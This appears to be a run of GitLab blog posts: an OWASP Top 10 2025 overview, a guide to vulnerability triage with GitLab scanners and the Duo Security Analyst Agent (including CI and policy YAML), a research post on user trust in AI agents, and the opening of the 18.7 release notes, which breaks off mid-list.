Deliver secure software faster with security testing in the same platform developers already use. To learn more, visit our application security testing solutions site.

## The OWASP Top 10 2025: Complete breakdown

### A01: Broken Access Control

##### What it is

Failures in enforcing policies that prevent users from acting outside their intended permissions, leading to unauthorized access.

##### Impact on your system

* Unauthorized information disclosure
* Complete data destruction or data modification
* Privilege escalation (users gaining admin rights)
* Viewing or editing other users' accounts
* API access from unauthorized or untrusted sources

##### Notable CWEs

* CWE-22: Path Traversal
* CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
* CWE-352: Cross-Site Request Forgery (CSRF)

### A02: Security Misconfiguration

##### What it is

Systems, applications, or cloud services configured incorrectly from a security perspective.

##### Impact on your system

* Exposure of sensitive information through error messages
* Unauthorized access through default accounts
* Unnecessary services or features enabled
* Outdated security patches
* Server does not send security headers or directives

##### Notable CWEs

* CWE-16: Configuration
* CWE-521: Weak Password Requirements
* CWE-798: Use of Hard-coded Credentials

### A03: Software Supply Chain Failures

##### What it is

Breakdowns or compromises in building, distributing, or updating software through vulnerabilities or malicious changes in dependencies, tools, or build processes.
##### Impact on your system

* Compromised packages introducing backdoors
* Malicious code injected during build processes
* Vulnerable dependencies cascading through your application
* Use of components from untrusted sources in production
* Changes within your supply chain are not tracked

##### Notable CWEs

* CWE-1395: Dependency on Vulnerable Third-Party Component
* CWE-1104: Use of Unmaintained Third Party Components

### A04: Cryptographic Failures

##### What it is

Failures related to lack of cryptography, insufficiently strong cryptography, leaking of cryptographic keys, and related errors.

##### Impact on your system

* Sensitive data exposure (passwords, credit cards, health records)
* Man-in-the-middle attacks
* Data breach through weak encryption
* Key compromise leading to system-wide exposure
* Regulatory compliance failures (GDPR, PCI DSS)

##### Notable CWEs

* CWE-327: Use of a Broken or Risky Cryptographic Algorithm
* CWE-330: Use of Insufficiently Random Values

### A05: Injection

##### What it is

System flaws allowing attackers to insert malicious code or commands (SQL, NoSQL, OS commands, LDAP, etc.) into programs.

##### Impact on your system

* Data loss or corruption through SQL injection
* Complete database compromise
* Server takeover through command injection
* Cross-site scripting (XSS) attacks
* Information disclosure
* Denial of service

##### Notable CWEs

* CWE-89: SQL Injection
* CWE-78: OS Command Injection

### A06: Insecure Design

##### What it is

Weaknesses in design representing different failures, expressed as missing or ineffective control design — architectural flaws rather than implementation bugs.

##### Impact on your system

* Weak password reset flows
* Missing authorization steps
* Flawed business logic allowing bypasses
* Inadequate threat modeling leading to blind spots
* Design patterns that fail under attack scenarios

##### Notable CWEs

* CWE-209: Generation of Error Messages Containing Sensitive Information
* CWE-522: Insufficiently Protected Credentials
* CWE-656: Reliance on Security Through Obscurity

### A07: Authentication Failures

##### What it is

Vulnerabilities allowing attackers to trick systems into recognizing invalid or incorrect users as legitimate.

##### Impact on your system

* Account takeover and credential stuffing
* Session hijacking
* Brute force attacks succeeding
* Weak password recovery mechanisms exploited
* Multi-factor authentication bypass

##### Notable CWEs

* CWE-287: Improper Authentication
* CWE-306: Missing Authentication for Critical Function
* CWE-521: Weak Password Requirements

### A08: Software or Data Integrity Failures

##### What it is

Code and infrastructure failing to protect against invalid or untrusted code/data being treated as trusted and valid.

##### Impact on your system

* Unsigned updates allowing malicious code injection
* Insecure deserialization leading to remote code execution
* CI/CD pipeline compromise
* Auto-update mechanisms exploited
* Tampered software artifacts

##### Notable CWEs

* CWE-345: Insufficient Verification of Data Authenticity
* CWE-346: Origin Validation Error
* CWE-347: Improper Verification of Cryptographic Signature

### A09: Security Logging & Alerting Failures

##### What it is

Insufficient logging and monitoring with inadequate alerting, which makes rapid response difficult.
##### Impact on your system

* Attacks go undetected for extended periods
* Breach investigation becomes impossible
* Compliance violations from lack of audit trails
* Delayed incident response
* Inability to determine scope of compromise

##### Notable CWEs

* CWE-117: Improper Output Neutralization for Logs
* CWE-532: Insertion of Sensitive Information into Log File
* CWE-778: Insufficient Logging

### A10: Mishandling of Exceptional Conditions

##### What it is

Programs failing to prevent, detect, and respond to unusual and unpredictable situations, which leads to crashes, unexpected behavior, or vulnerabilities.

##### Impact on your system

* Information disclosure through verbose error messages
* Denial of service from unhandled exceptions
* State corruption from improper error handling
* Race conditions exploited
* Systems failing open instead of closed
* Application crashes exposing sensitive data

##### Notable CWEs

* CWE-248: Uncaught Exception
* CWE-390: Detection of Error Condition Without Action
* CWE-391: Unchecked Error Condition

## Prevention and remediation best practices

GitLab provides tools that enable you not only to quickly find and remediate vulnerabilities within the OWASP Top 10, but also to prevent them from making it into your production system. By following these best practices you can enhance and maintain your security posture:

#### Automated security scanning for all repositories

* Perform SAST scanning to detect insecure design patterns like plaintext password storage, inadequate error handling, and missing encryption during code review, catching design flaws early in the development lifecycle.
* Perform Secret Detection to identify credentials in configuration files, environment variables, and code, preventing plaintext password storage and ensuring secrets are properly managed through GitLab's CI/CD variables with masking and encryption.
* Perform DAST scanning to detect broken access control vulnerabilities.
* Perform Dependency Scanning to check project dependencies against vulnerability databases, identifying known CVEs in direct and transitive dependencies across multiple package managers (npm, pip, Maven, etc.).
* Perform Container Scanning to analyze Docker images for vulnerable base layers and packages, ensuring container supply chain security before deployment.
* Perform IaC Scanning to check your infrastructure definition files for known vulnerabilities.
* Leverage API Security Testing tools to secure and protect web APIs from unauthorized access, misuse, and attacks.
* Perform Web API Fuzz Testing to discover bugs and potential vulnerabilities that other QA processes might miss.

_View vulnerabilities detected in an MR, with the diff from the feature branch to the main branch._

#### Understand your security posture

* Generate a software bill of materials (SBOM) for complete dependency visibility and compliance requirements.
* Leverage the Vulnerability Report to sort through and triage vulnerabilities via a consolidated view of security vulnerabilities found in your codebase.
* Quickly take action on vulnerabilities using detailed remediation guidance and risk assessment data.
* Use Security Inventory to visualize which assets you need to secure and understand the actions you need to take to improve security.
* Leverage Compliance Center to manage compliance standards adherence reporting, violations reporting, and compliance frameworks.
_Use Security Inventory to view enabled security scanners and vulnerabilities._

#### Set up prevention and maintain documentation

* Configure Security Policies to block merges or deployments when high-severity vulnerabilities are detected in dependencies, enforcing security standards automatically (a sketch of such a policy appears at the end of this post).
* Use Compliance Frameworks to enforce organizational security standards through automated policy checks that verify encryption requirements, credential management practices, and secure workflow implementations are followed.
* Use GitLab Wiki and repository documentation to maintain security design principles, approved patterns, and architectural decision records that guide developers toward secure-by-design implementations.
* Implement merge request approval rules requiring security architect review for features involving authentication, authorization, encryption, or sensitive data handling, ensuring design-level security validation.
* Create tests to verify input validation and allowlist approaches for file paths.
* Use GitLab Issues and Epics to document security requirements and threat models during the design phase, creating a traceable record of security decisions and ensuring security considerations are addressed before implementation begins.

_View and set Security Policies scoped to instance, group, or project._

#### Leverage AI

* Use Code Suggestions for proactive guidance during development, suggesting secure design patterns like proper password hashing (bcrypt, Argon2), encrypted storage mechanisms, and appropriate error handling that doesn't leak sensitive information.
* Use Security Analyst Agent to review detected insecure design vulnerabilities in context, explaining the architectural implications, assessing risk based on your application's threat model, and providing remediation strategies that address root design flaws rather than just symptoms.
* Review your code using AI to help ensure consistent code review standards in your project.

_Leverage Security Analyst Agent to quickly triage and assess security vulnerabilities._

## Key takeaways for development teams

* **Supply chain security is critical**: With A03's addition and high impact scores, securing your software supply chain is no longer optional. Implement SBOM tracking, dependency scanning, and integrity verification throughout your pipeline.
* **Configuration matters more than ever**: The rise to #2 shows that configuration-based security is now a primary attack vector. Automate configuration verification and implement IaC with security baked in.
* **Traditional threats persist**: While Injection and Cryptographic Failures dropped in ranking, they remain critical. Don't deprioritize them just because they've fallen on the list.
* **Error handling is security**: The new A10 category emphasizes that how your application handles failures is a security concern. Implement secure error handling from the start.
* **Testing must evolve**: The expanded CWE coverage (589 vs. ~400 in 2021) means testing strategies must be comprehensive. Combine SAST, DAST, source code analysis, and manual penetration testing for effective coverage.

> Explore our GitLab Security and Governance Solutions and security scanning documentation to start strengthening your security posture today.
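To make the policy enforcement above concrete, here's a minimal scan execution policy that forces SAST and Secret Detection to run on every default-branch pipeline, regardless of what each project's `.gitlab-ci.yml` defines. This is a sketch based on the documented `scan_execution_policy` schema; the policy name and branch list are placeholders to adapt:

```yaml
# Sketch of a scan execution policy (stored in a security policy project).
# Name and branches are placeholders; see the GitLab security policies
# documentation for the full schema supported by your version.
scan_execution_policy:
  - name: Enforce SAST and secret detection
    description: Run scanners on every pipeline for the default branch
    enabled: true
    rules:
      - type: pipeline
        branches:
          - main
    actions:
      - scan: sast
      - scan: secret_detection
```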
about.gitlab.com
January 7, 2026 at 10:51 PM
AI-powered vulnerability triaging with GitLab Duo Security Agent
Security vulnerabilities are discovered constantly in modern applications. Development teams often face hundreds or thousands of findings from security scanners, making it challenging to identify which vulnerabilities pose the greatest risk and should be prioritized. This is where effective vulnerability triaging becomes essential.

In this article, we'll explore how GitLab's integrated security scanning capabilities, combined with the GitLab Duo Security Analyst Agent, can transform vulnerability management from a time-consuming manual process into an intelligent, efficient workflow.

> 💡 Join GitLab Transcend on February 10 to learn how agentic AI transforms software delivery. Hear from customers and discover how to jumpstart your own modernization journey. Register now.

## What is vulnerability triaging?

Vulnerability triaging is the process of analyzing, prioritizing, and deciding how to address security findings discovered in your applications. Not all vulnerabilities are created equal — some represent critical risks requiring immediate attention, while others may be false positives or pose minimal threat in your specific context.

Traditional triaging involves:

* **Reviewing scan results** from multiple security tools
* **Assessing severity** based on CVSS scores and exploitability
* **Understanding context** such as whether vulnerable code is actually reachable
* **Prioritizing remediation** based on business impact and risk
* **Tracking resolution** through to deployment

This process becomes overwhelming when dealing with large codebases and frequent scans. GitLab addresses these challenges through integrated security scanning and AI-powered analysis.

## How to add integrated security scanners in GitLab

GitLab provides built-in security scanners that integrate seamlessly into your CI/CD pipelines. These scanners run automatically during pipeline execution and populate GitLab's Vulnerability Report with findings from the default branch.

### Available security scanners

GitLab offers the following security scanning capabilities:

* **Static Application Security Testing (SAST)**: Analyzes source code for vulnerabilities
* **Dependency Scanning**: Identifies vulnerabilities in project dependencies
* **Container Scanning**: Scans Docker images for known vulnerabilities
* **Dynamic Application Security Testing (DAST)**: Tests running applications for vulnerabilities
* **Secret Detection**: Finds accidentally committed secrets and credentials
* **Infrastructure-as-Code (IaC) Scanning**: Analyzes infrastructure as code for misconfigurations
* **API Security Testing**: Tests web APIs to help discover bugs and potential security issues
* **Web API Fuzzing**: Passes unexpected values to API operation parameters to cause unexpected behavior and errors in the backend

### Example: Adding SAST and Dependency Scanning

To enable security scanning, add the scanners to your `.gitlab-ci.yml` file. In this example, we include the SAST and Dependency Scanning templates, which automatically run those scanners in the test stage. Each scanner can be customized using variables (which differ for each scanner). For example, the `SAST_EXCLUDED_PATHS` variable tells SAST to skip the directories/files provided. Security jobs can be further overridden using the GitLab job syntax.
```yaml
include:
  - template: Security/SAST.gitlab-ci.yml
  - template: Security/Dependency-Scanning.gitlab-ci.yml

stages:
  - test

variables:
  SAST_EXCLUDED_PATHS: "spec/, test/, tests/, tmp/"
```

### Example: Adding Container Scanning

GitLab provides a built-in container registry where you can store container images for each GitLab project. To scan those containers for vulnerabilities, you can enable container scanning. This example shows how a container is built and pushed in the `build-container` job running in the `build` stage, and how it is then scanned in the same pipeline in the `test` stage:

```yaml
include:
  - template: Security/Container-Scanning.gitlab-ci.yml

stages:
  - build
  - test

build-container:
  stage: build
  variables:
    IMAGE: $CI_REGISTRY_IMAGE/$CI_COMMIT_REF_SLUG:$CI_COMMIT_SHA
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
  script:
    - docker build -t $IMAGE .
    - docker push $IMAGE

container_scanning:
  variables:
    CS_IMAGE: $CI_REGISTRY_IMAGE/$CI_COMMIT_REF_SLUG:$CI_COMMIT_SHA
```

Once configured, these scanners execute automatically in your pipeline and report findings to the Vulnerability Report.

**Note:** Although not covered in this blog, in merge requests, scanners show the diff of vulnerabilities from a feature branch to the target branch. Additionally, granular security policies can be created to prevent vulnerable code from being merged without approval when vulnerabilities are detected, as well as to force scanners to run regardless of how the `.gitlab-ci.yml` is defined (a sketch of such a policy follows this section).

## Triaging using the Vulnerability Report and vulnerability pages

After scanners run, GitLab aggregates all findings in centralized views that make triaging more manageable.

### Accessing the Vulnerability Report

Navigate to **Security & Compliance > Vulnerability Report** in your project or group. This page displays all discovered vulnerabilities with key information:

* Severity levels (Critical, High, Medium, Low, Info)
* Status (Detected, Confirmed, Dismissed, Resolved)
* Scanner type that detected the vulnerability
* Affected files and lines of code
* Detection date and pipeline information

### Filtering and organizing vulnerabilities

The Vulnerability Report provides powerful filtering options:

* Filter by severity, status, scanner, identifier, and reachability
* Group by severity, status, scanner, or OWASP Top 10 category
* Search for specific CVEs or vulnerability names
* Sort by detection date or severity
* View trends over time with the security dashboard

### Manual workflow triage

Traditional triaging in GitLab involves:

1. **Reviewing each vulnerability** by clicking into the detail page
2. **Assessing the description** to understand the potential impact
3. **Examining the affected code** through integrated links
4. **Checking for existing fixes** or patches in dependencies
5. **Setting status** (Confirm, Dismiss with reason, or create an issue)
6. **Assigning ownership** for remediation

This is an example of the vulnerability data provided to support triage, including the code flow:

When on the vulnerability detail page, you can select **Edit vulnerability** to change its status and provide a reason. You can then create an issue and assign ownership for remediation.

While this workflow is comprehensive, it requires security expertise and can be time-consuming when dealing with hundreds of findings. This is where GitLab Duo Security Analyst Agent, part of GitLab Duo Agent Platform, becomes invaluable.
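Here's the policy sketch referenced in the note above: a merge request approval (scan result) policy that requires an approval whenever an MR would introduce new critical findings. This follows the documented scan result policy schema, but the name, scanners, thresholds, and approvers are placeholders to adapt; check the security policies documentation for the exact schema your GitLab version supports:

```yaml
# Sketch of a merge request approval (scan result) policy; all values are
# placeholders, not a drop-in configuration.
scan_result_policy:
  - name: Block unapproved critical findings
    description: Require approval when an MR introduces new critical vulnerabilities
    enabled: true
    rules:
      - type: scan_finding
        branches:
          - main
        scanners:
          - sast
          - dependency_scanning
        vulnerabilities_allowed: 0          # any new finding triggers the action
        severity_levels:
          - critical
        vulnerability_states:
          - newly_detected
    actions:
      - type: require_approval
        approvals_required: 1
        role_approvers:
          - maintainer
```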
## Triaging using the Vulnerability Report and Pages

After scanners run, GitLab aggregates all findings in centralized views that make triaging more manageable.

### Accessing the Vulnerability Report

Navigate to **Security & Compliance > Vulnerability Report** in your project or group. This page displays all discovered vulnerabilities with key information:

* Severity levels (Critical, High, Medium, Low, Info)
* Status (Detected, Confirmed, Dismissed, Resolved)
* Scanner type that detected the vulnerability
* Affected files and lines of code
* Detection date and pipeline information

### Filtering and organizing vulnerabilities

The Vulnerability Report provides powerful filtering options:

* Filter by severity, status, scanner, identifier, and reachability
* Group by severity, status, scanner, or OWASP Top 10 category
* Search for specific CVEs or vulnerability names
* Sort by detection date or severity
* View trends over time with the security dashboard

### Manual workflow triage

Traditional triaging in GitLab involves:

1. **Reviewing each vulnerability** by clicking into the detail page
2. **Assessing the description** and understanding the potential impact
3. **Examining the affected code** through integrated links
4. **Checking for existing fixes** or patches in dependencies
5. **Setting status** (Confirm, Dismiss with reason, or create an issue)
6. **Assigning ownership** for remediation

Here is an example of the vulnerability data provided for triage, including the code flow. When on the vulnerability data page, you can select **Edit vulnerability** to change its status as well as provide a reason. Then you can create an issue and assign ownership for remediation.

While this workflow is comprehensive, it requires security expertise and can be time-consuming when dealing with hundreds of findings. This is where GitLab Duo Security Analyst Agent, part of GitLab Duo Agent Platform, becomes invaluable.

## About Security Analyst Agent and how to set it up

GitLab Duo Security Analyst Agent is an AI-powered tool that automates vulnerability analysis and triaging. The agent understands your application context, evaluates risk intelligently, and provides actionable recommendations.

### What Security Analyst Agent does

The agent analyzes vulnerabilities by:

* **Evaluating exploitability** in your specific codebase context
* **Assessing reachability** to determine if vulnerable code paths are actually used
* **Prioritizing based on risk** rather than just CVSS scores
* **Explaining vulnerabilities** in clear, actionable language
* **Recommending remediation steps** specific to your application
* **Reducing false positives** through contextual analysis

### Prerequisites

To use Security Analyst Agent, you need:

* A GitLab Ultimate subscription with GitLab Duo Agent Platform enabled
* Security scanners configured in your project
* At least one vulnerability in your Vulnerability Report

### Enabling Security Analyst Agent

Security Analyst Agent is a foundational agent. Unlike the general-purpose GitLab Duo agent, foundational agents understand the unique workflows, frameworks, and best practices of their specialized domains. Foundational agents can be accessed directly from your project without any additional configuration. You can find Security Analyst Agent in the AI Catalog.

To dive in and see the details of the agent, such as its system prompt and tools:

1. Navigate to **gitlab.com/explore/**.
2. Select **AI Catalog** from the side tab.
3. Select **Security Analyst Agent** from the list.

The agent is integrated directly into your existing workflow without requiring additional configuration beyond the defined prerequisites.

## Using Security Analyst Agent to find the most critical vulnerabilities

Now let's explore how to leverage Security Analyst Agent to quickly identify and prioritize the vulnerabilities that matter most.

### Starting an analysis

To start an analysis, navigate to your GitLab project (ensure it meets the prerequisites). Then open GitLab Duo Chat and select the **Security Agent**. From the chat, select the model to use with the agent and make sure Agentic mode is enabled. A chat will open where you can engage with Security Analyst Agent through its conversational interface. This agent can perform:

* **Vulnerability triage**: Analyze and prioritize security findings across different scan types.
* **Risk assessment**: Evaluate the severity, exploitability, and business impact of vulnerabilities.
* **False positive identification**: Distinguish genuine threats from benign findings.
* **Compliance management**: Understand regulatory requirements and remediation timelines.
* **Security reporting**: Generate summaries of security posture and remediation progress.
* **Remediation planning**: Create actionable plans to address security vulnerabilities.
* **Security workflow automation**: Streamline repetitive security assessment tasks.

Additionally, you can review the tools that Security Analyst Agent has at its disposal in its AI Catalog entry.

For example, I can ask "**What are the most critical vulnerabilities and which vulnerabilities should I address first?**" to make it easy to determine what is important.
The agent will respond as follows:

### Example queries for effective triaging

Here are powerful queries to use with the Security Analyst Agent:

**Identify critical issues:** "Show me vulnerabilities that are actively exploitable in our production code"

**Focus on reachable vulnerabilities:** "Which high-severity vulnerabilities are in code paths that are actually executed?"

**Understand dependencies:** "What are the most critical dependency vulnerabilities and are patches available?"

**Get remediation guidance:** "Explain how to fix the SQL injection vulnerability in user authentication"

You can also directly assign developers to vulnerabilities.

### Understanding agent recommendations

When Security Analyst Agent analyzes vulnerabilities, it provides:

**Risk assessment**: The agent explains why a vulnerability is critical beyond just the CVSS score, considering your application's specific architecture and usage patterns.

**Exploitability analysis**: It determines whether vulnerable code is actually reachable and exploitable in your environment, helping filter out theoretical risks.

**Remediation steps**: The agent provides specific, actionable guidance on how to fix vulnerabilities, including code examples when appropriate.

**Priority ranking**: Instead of overwhelming you with hundreds of findings, the agent helps identify the top issues that should be addressed first.

### Real-world workflow example

Here's how a typical triaging session might look:

1. **Start with the big picture**: "Analyze the security posture of this project and highlight the top 5 most critical vulnerabilities."
2. **Dive into specifics**: For each critical vulnerability identified, ask "Is this vulnerability actually exploitable in our application?"
3. **Plan remediation**: "What's the recommended fix for this SQL injection issue, and are there any side effects to consider?"
4. **Track progress**: After addressing critical issues, ask "What vulnerabilities should I prioritize next?"

### Benefits of agent-assisted triaging

Using Security Analyst Agent transforms vulnerability management:

* **Time savings**: Reduce hours of manual analysis to minutes of guided review
* **Better prioritization**: Focus on vulnerabilities that actually pose risk to your specific application
* **Knowledge transfer**: Learn security best practices through agent explanations
* **Consistent standards**: Apply consistent triaging logic across all projects
* **Reduced alert fatigue**: Filter noise and false positives effectively

## Get started today

Vulnerability triaging doesn't have to be an overwhelming manual process. By combining GitLab's integrated security scanners with GitLab Duo Security Analyst Agent, development teams can quickly identify and prioritize the vulnerabilities that truly matter. The agent's ability to understand context, assess real risk, and provide actionable guidance transforms security scanning from a compliance checkbox into a practical, efficient part of your development workflow. Instead of drowning in hundreds of vulnerability reports, you can focus your energy on addressing the issues that actually threaten your application's security.

Start by enabling security scanners in your GitLab pipelines, then leverage Security Analyst Agent to make intelligent, informed decisions about vulnerability remediation. Your future self — and your security team — will thank you.
> **Ready to get started?** Check out the GitLab Duo Agent Platform documentation and security scanning documentation to begin transforming your vulnerability management workflow today.
about.gitlab.com
January 6, 2026 at 10:44 PM
Building trust in agentic tools: What we learned from our users
As AI agents become increasingly sophisticated partners in software development, a critical question emerges: How do we build lasting trust between humans and these autonomous systems? Recent research from GitLab's UX Research team reveals that trust in AI agents isn't built through dramatic breakthroughs, but rather through countless small interactions, called inflection points, that accumulate over time to create confidence and reliability.

Our comprehensive study of 13 agentic tool users from companies of different sizes identified that adoption happens through "micro-inflection points": subtle design choices and interaction patterns that gradually build the trust needed for developers to rely on AI agents in their daily workflows. These findings offer crucial insights for organizations implementing AI agents in their DevSecOps processes.

Traditional software tools earn trust through predictable behavior and consistent performance. AI agents, however, operate with a degree of autonomy that introduces uncertainty. **Our research shows that users don't commit to AI tools through single "aha" moments. Instead, they develop trust through accumulated positive micro-interactions that demonstrate the agent understands their context, respects their guardrails, and enhances rather than disrupts their workflows.**

This incremental trust-building is especially critical in DevSecOps environments, where mistakes can impact production systems, customer data, and business operations. Each small interaction either reinforces or erodes the foundation of trust necessary for productive human-AI collaboration.

## Four pillars of trust in AI agents

Our research identified four key categories of micro-inflection points that build user trust:

### 1. Safeguarding actions

Trust begins with safety. Users need confidence that AI agents won't cause irreversible damage to their systems. Essential safeguards include:

* **Confirmation dialogs for critical changes:** Before executing operations that could affect production systems or delete data, agents should pause and seek explicit approval
* **Rollback capabilities:** Users must know they can undo agent actions if something goes wrong
* **Secure boundaries:** For organizations with compliance requirements, agents must respect data residency and security policies without constant manual oversight

### 2. Providing transparency

Users can't trust what they can't understand. Effective AI agents maintain visibility through:

* **Real-time progress updates:** Especially crucial when user attention might be needed
* **Action explanations:** Before executing high-stakes operations, agents should clearly communicate their planned approach
* **Clear error handling:** When issues arise, users need immediate alerts with understandable error messages and recovery paths

This transparency transforms AI agents from mysterious black boxes into comprehensible partners whose logic users can follow and verify.

### 3. Remembering context

Nothing erodes trust faster than having to repeatedly teach an AI agent the same information.
Trust-building agents demonstrate memory through:

* **Preference retention:** Accepting and applying user feedback about coding styles, deployment patterns, or workflow preferences
* **Context awareness:** Remembering previous instructions and project-specific requirements
* **Adaptive learning:** Evolving based on user corrections without requiring explicit reprogramming

Our research participants consistently highlighted frustration with tools that couldn't remember basic preferences, forcing them to provide the same guidance repeatedly.

### 4. Anticipating needs

Trust emerges when AI agents proactively support user workflows. Agents could support the user in the following ways:

* **Pattern recognition:** Learning user routines and predicting tasks based on time of day or project context
* **Intelligent agent selection:** Automatically recognizing which specialized agents are most relevant for specific tasks
* **Environment analysis:** Understanding coding environments, dependencies, and project structures without explicit configuration

These anticipatory capabilities transform AI agents from reactive tools into proactive partners that reduce cognitive load and streamline development processes.

## Implementing trust-building features

For organizations deploying AI agents, our research suggests several practical implementations:

* **Start with low-risk environments:** Allow users to build trust gradually by beginning with non-critical tasks. As confidence grows through positive micro-interactions, users naturally expand their reliance on AI capabilities.
* **Design for continuous orchestration of agents, which includes intervention:** Unlike traditional automation, AI agents should know when to pause and seek human input. This intervention assures users that they maintain ultimate control while benefiting from AI efficiency. Agents also need autonomy-level controls so that users can calibrate autonomy for different types of action, in different contexts.
* **Maintain audit trails:** Every agent action should be traceable, allowing users to understand not just what happened, but why the agent made specific decisions.
* **Personalize the experience:** Agents that adapt to individual user preferences and team workflows create stronger trust bonds than one-size-fits-all solutions.

## The compounding impact of trust

Our findings reveal that trust in AI agents follows a compound growth pattern. Each positive micro-interaction makes users slightly more willing to rely on the agent for the next task. Over time, these small trust deposits accumulate into deep confidence that transforms AI agents from experimental tools into essential development partners.

This trust-building process is delicate – a single significant failure can erase weeks of accumulated confidence. That's why consistency in these micro-inflection points is crucial. Every interaction matters. Supporting these micro-inflection points is a cornerstone of having software teams and their AI agents collaborate at enterprise scale with intelligent orchestration.

## Next steps

Building trust in AI agents requires intentional design focused on user needs and concerns.
Organizations implementing agentic tools should:

* Audit their AI agents for trust-building micro-interactions
* Prioritize transparency and user control in agent design
* Invest in memory and learning capabilities that reduce user friction
* Create clear escalation paths for when agents encounter uncertainty

## Key takeaways

* Trust in AI agents builds incrementally through micro-inflection points rather than breakthrough moments
* Four key categories drive trust: safeguarding actions, providing transparency, remembering context, and anticipating needs
* Small design choices in AI interactions have compound effects on user adoption and long-term reliance
* Organizations must intentionally design for trust through consistent, positive micro-interactions

**Help us learn what matters to you:** Your experiences and insights are invaluable in shaping how we design and improve agentic interactions. Join our research panel to participate in upcoming studies.

**Explore GitLab's agents in action:** GitLab Duo Agent Platform extends AI's speed beyond just coding to your entire software lifecycle. With your workflows defining the rules, your context maintaining organizational knowledge, and your guardrails ensuring control, teams can orchestrate while agents execute across the SDLC. Visit the GitLab Duo Agent Platform site to discover how intelligent orchestration can transform your DevSecOps journey. Whether you're exploring agents for the first time or looking to optimize your existing implementations, we believe that understanding and designing for trust is the key to successful adoption. Let's build that future together!
about.gitlab.com
January 5, 2026 at 10:48 PM
GitLab 18.7: Advancing AI automation, governance, and developer experience
GitLab 18.7 delivers development, operations, and security capabilities that strengthen control, improve consistency, and build confidence as teams integrate AI further into their workflows. These improvements arrive as GitLab approaches a major milestone. GitLab Duo Agent Platform will reach general availability in January 2026 with our 18.8 release, provided we continue to meet the exceptionally high quality standards we set for ourselves in service to our customers worldwide across all industries.

GitLab Duo Agent Platform's GA is designed to introduce a unified, governed way for organizations to orchestrate agentic AI across their software lifecycle. With foundational agents, custom agents, and automated flows working together inside GitLab, teams will be able to adopt agentic workflows that help accelerate work while staying aligned to organizational standards. At GA, we also plan to include expanded AI Catalog functionality, stronger administrative controls, reliability enhancements, and a flexible usage-based billing model designed to provide flexibility for agentic AI usage across many roles and projects.

The 18.7 release adds important building blocks to support GitLab Duo Agent Platform's upcoming GA. New automation features, stronger governance controls, and enhancements across security and pipeline authoring help teams streamline their work and lay the groundwork for an even more reliable agentic experience in 18.8 and beyond.

> On February 10, 2026, we will host a global launch event that brings our vision of GitLab as the intelligent orchestration platform to life, where software teams and their AI agents stay in flow. You will hear how customers are tackling the AI paradox in software delivery, see intelligent orchestration in action across DevSecOps workflows, and get a jump start on what this next chapter means for your own modernization journey. Reserve your spot to see how GitLab's next chapter comes together.

**Here's what's new in 18.7:**

## GitLab Duo Agent Platform

As more teams bring AI into their development and security workflows, GitLab continues to focus on making adoption powerful and predictable. The updates in 18.7 strengthen the foundation for guided, governed AI experiences that will become fully realized when GitLab Duo Agent Platform reaches GA, as planned for 18.8.

**Custom Flows**

Custom Flows introduce a new way for teams to automate multistep workflows using YAML-defined sequences that orchestrate agents to complete repetitive development tasks. Custom Flows help eliminate manual effort for scenarios that follow predictable patterns — such as diagnosing and fixing failed pipelines, updating dependencies, or running policy checks when reviewers are assigned. Instead of handling these tasks interactively, teams can define flows that automatically trigger from GitLab events like mentions and assignments. This capability supports developers who want tailored automations for their own projects, as well as administrators who need consistent, organization-wide workflows for compliance and operational efficiency.

**SAST False Positive Detection Flow**

AI-powered false positive management for Static Application Security Testing (SAST) introduces a faster, more accurate way for teams to assess and act on potential false positives. GitLab now uses AI to help identify which findings may be false positives earlier in the review process, reducing the time developers and security teams spend triaging noise.
Users can see an overview of how many vulnerabilities may warrant review, track their analysis progress, and dismiss false positives directly from the vulnerability report. Once dismissed, these findings stay dismissed across future pipelines and continue to reflect the correct dismissed status in merge request widgets. This provides a consistent, reliable signal as code evolves and helps teams focus on real risks, streamline remediation, and cut down on unnecessary security review cycles.

**Custom Agent Versioning**

Custom Agent Versioning gives teams control over which version of an AI Catalog agent or flow they use in their projects. Instead of automatically inheriting updates from the creator, GitLab now pins each project to the exact version of the agent or flow enabled for the team. This helps prevent breaking changes, security risks, and workflow disruptions, especially in production pipelines or security-sensitive environments. Teams can upgrade when they choose, test new versions in staging before promoting them, and clearly see which version is running to avoid confusion. It also enables safer customization by letting users fork an agent at a specific version and evolve it independently. The result is a more predictable, stable, and secure way to adopt custom agents across development and CI/CD workflows.

**New Settings for Foundational Agents**

Admins now have the ability to turn foundational agents on or off, giving teams greater control over how AI is used across their organization. With this update, admins can enable or disable these agents at the instance or group level, choose default availability, and control how new agents are introduced while still providing access to the core agent. The result is more flexible AI adoption with the governance, consistency, and control enterprise teams need.

**Data Analyst Agent**

The Data Analyst Agent gives teams a simple way to explore GitLab data using natural language, automatically generating GitLab Query Language (GLQL) queries, retrieving relevant information, and presenting clear insights without requiring dashboards or manual query writing. Users can analyze work volume, understand team activity, identify development trends, monitor issue and merge request status, and quickly discover work items by labels, authors, milestones, or other criteria. It also creates reusable GLQL queries that can be embedded anywhere GitLab Flavored Markdown is supported, making it easier to share findings and answer everyday questions about project activity directly within GitLab.

## Core DevOps

Innovations with GitLab Duo Agent Platform are most effective when the underlying DevOps experience is equally streamlined and dependable. The improvements in 18.7 to core GitLab workflows help ensure that automation, pipelines, and reusable components operate with the highest levels of clarity and consistency.

**Dynamic Input Selection in GitLab Pipelines**

Dynamic Input Selection in GitLab Pipelines introduces a more intuitive way to trigger pipelines through dynamic, cascading dropdown fields in the GitLab UI. This allows cross-functional teams to run pipelines without editing YAML or relying on developers, while ensuring that only valid, context-aware options are shown as they make selections. The feature supports complex workflows, helps reduce misconfigured runs, and removes a key blocker for teams migrating from Jenkins Active Choice, helping organizations standardize their CI/CD processes entirely on GitLab.
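Dynamic Input Selection builds on GitLab CI/CD inputs. As a rough sketch of the underlying mechanism (the cascading-dropdown behavior itself is layered on top of inputs like these, and the input names here are illustrative), a pipeline can declare typed inputs with allowed options that the run-pipeline form renders as dropdowns:

```yaml
spec:
  inputs:
    environment:
      description: "Deployment target, shown as a dropdown in the run-pipeline form"
      options: [staging, production]
      default: staging
---
deploy:
  script:
    # Input values are interpolated where the pipeline is compiled.
    - ./deploy.sh --environment "$[[ inputs.environment ]]"
```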
**CI/CD Catalog Publication Guardrails**

